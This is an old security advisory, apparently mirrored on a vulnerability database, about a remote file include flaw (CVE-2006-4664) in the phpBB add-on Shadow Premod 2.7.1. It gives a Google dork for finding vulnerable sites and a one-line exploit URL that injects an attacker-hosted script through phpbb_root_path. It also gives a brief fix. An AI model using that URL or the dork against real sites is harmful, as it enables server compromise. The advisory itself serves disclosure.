Shadow Pr�mod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability

Shadow Prmod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability

2006.09.12

Credit: ciriboflacs

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-4664

CWE: CWE-Other

CVSS Base Score: 5.1/10

Impact Subscore: 6.4/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

------------------------------------------------------------------------
---
Shadow Prmod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability
------------------------------------------------------------------------
---
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Google d0rk: "Derni?re version de la Prmod Shadow sur phpBB.biz"
------------------------------------------------------------------------
---
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Shadow Prmod
version : 2.7.1
URL : http://premod-shadow.info
------------------------------------------------------------------
Exploit:
~~~~~~~
Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path
=[Evil_Script]
------------------------------------------------------------------------
---
Solution :
~~~~~~~~~
declare variabel $phpbb_root_path
------------------------------------------------------------------------
---
Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org Wink and RST [ hTTp://RST-CREW.net ]
------------------------------------------------------------------------
---
*/
Contact:
~~~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
_/*
-------------------------------- [ EOF] ----------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Shadow Prmod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.